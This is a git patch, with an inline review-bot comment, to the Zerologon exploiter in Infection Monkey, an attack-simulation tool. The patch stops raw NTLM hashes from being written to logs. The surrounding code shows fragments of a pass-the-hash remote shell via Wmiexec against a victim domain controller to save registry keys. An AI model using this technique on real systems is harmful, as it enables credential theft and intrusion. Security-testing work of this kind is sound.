From 28edf7d2b79b017b96e414f03481c55838a5a24f Mon Sep 17 00:00:00 2001
From: Shreya
Date: Wed, 24 Feb 2021 16:08:36 +0530
Subject: [PATCH] Encrypt credentials before logging

---
 monkey/infection_monkey/exploit/zerologon.py | 17 ++++++++++-------
 1 file changed, 10 insertions(+), 7 deletions(-)

diff --git a/monkey/infection_monkey/exploit/zerologon.py b/monkey/infection_monkey/exploit/zerologon.py
index 5cf589fcd..dee5c349a 100644
--- a/monkey/infection_monkey/exploit/zerologon.py
+++ b/monkey/infection_monkey/exploit/zerologon.py
@@ -163,13 +163,13 @@ class ZerologonExploiter(HostExploiter):
             ]
             try:
                 original_pwd_nthash = self.get_original_pwd_nthash(
-                    username, ":".join(user_pwd_hashes)
+                    username, user_pwd_hashes
                 )
                 if original_pwd_nthash:
                     break
             except Exception as e:
                 LOG.info(
-                    f'Credentials "{user_details}" didn\'t work. Exception: {str(e)}'
+                    f"Credentials didn\'t work. Exception: {str(e)}"
                 )
 
         if not original_pwd_nthash:
@@ -304,7 +304,7 @@ class ZerologonExploiter(HostExploiter):
         if nthash not in self._config.exploit_ntlm_hash_list:
             self._config.exploit_ntlm_hash_list.append(nthash)
 
-    def get_original_pwd_nthash(self, username: str, user_pwd_hashes: str) -> str:
+    def get_original_pwd_nthash(self, username: str, user_pwd_hashes: List[str]) -> str:
         if not self.save_HKLM_keys_locally(username, user_pwd_hashes):
             return
 
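Review bot: The rewritten LOG.info in the except branch drops every identifier of the credential set that failed, so a loop over several entries (the loop header sits above this hunk) now logs indistinguishable messages; the username is not a secret and can stay, e.g. `f"Credentials for user {username} didn't work. Exception: {e}"`. The `\'` escape is a no-op inside a double-quoted f-string and `str(e)` is redundant in an f-string field. The exception text is still interpolated verbatim, so whether anything sensitive can reach the log now depends on what get_original_pwd_nthash raises, which is outside this hunk. The enclosing try/loop and method start outside the hunk.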
@@ -335,13 +335,16 @@ class ZerologonExploiter(HostExploiter):
         finally:
             self.remove_locally_saved_HKLM_keys()
 
-    def save_HKLM_keys_locally(self, username: str, user_pwd_hashes: str) -> bool:
-        LOG.debug(
-            f'Starting remote shell on victim with user: "{username}" and hashes: "{user_pwd_hashes}". '
+    def save_HKLM_keys_locally(self, username: str, user_pwd_hashes: List[str]) -> bool:
+        LOG.info(
+            f'Starting remote shell on victim with credentials:\n'
+            f'user: {username}\n'
+            f'hashes (SHA-512): {self._config.hash_sensitive_data(user_pwd_hashes[0])} : '
+            f'{self._config.hash_sensitive_data(user_pwd_hashes[1])}'
         )
         wmiexec = Wmiexec(
-            ip=self.dc_ip, username=username, hashes=user_pwd_hashes, domain=self.dc_ip
+            ip=self.dc_ip, username=username, hashes=':'.join(user_pwd_hashes), domain=self.dc_ip
         )
         remote_shell = wmiexec.get_remote_shell()